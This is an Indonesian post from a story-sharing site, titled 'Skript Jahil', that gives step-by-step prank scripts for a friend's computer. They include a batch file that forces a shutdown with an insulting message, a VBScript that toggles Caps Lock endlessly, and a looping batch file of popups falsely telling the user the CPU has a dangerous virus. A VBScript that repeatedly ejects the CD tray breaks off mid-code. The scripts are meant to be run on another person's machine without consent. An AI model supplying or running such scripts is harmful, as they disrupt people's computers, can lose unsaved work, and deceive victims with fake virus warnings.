Skript Jahil

27 0 0
                                    

Iseng-iseng ngerjain komputer teman 

langkah-langkahnya :

1. Kamu harus mempunyai aplikasi Notepad (klo ga punya kebangetan >.<)

2. kalau sudah punya ikuti langkah di bawah ini.

3. klik start > all programs > accessories > Notepad

4. copy paste script di bawah ini ke Notepad.

#1# Membuat komputer Shoutdown sendiri 

#################################################################

@echo off

msg * I don't like you

shutdown -c "Error! You are too ******!" -s

################################################################

Lalu save As dengan nama :Sixtyxix-cyber.bat type file : All file

*************************************************************************************

#2# Membuat Tombol Caps Lock menyala terus-menerus 

################################################################

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop

###############################################################

Lalu save As dengan nama :Sixtyxix-cyber.vbs type file : All file

[Tombol CAPSLOCK akan menyala terus-menerus]

************************************************************************************

#3# Membuat Pesan Jail mucul terus 

#############################################################

@ECHO off

:Begin

msg * Assalammualaikum

msg * izin ya bos,

msg * cuma ngasih virus rendah doang

msg * cpu bos dah kena virus berbahaya

msg * biar masalah nya kelar

GOTO BEGIN

#############################################################

Lalu save As dengan nama :Sixtyxix-cyber.bat type file : All file

Script ini, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera bos

**********************************************************************************

#4# membuka Tutup CD/DVD room 

#############################################################

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

You've reached the end of published parts.

⏰ Last updated: Jun 27, 2013 ⏰

Add this story to your Library to get notified about new parts!

Skript JahilWhere stories live. Discover now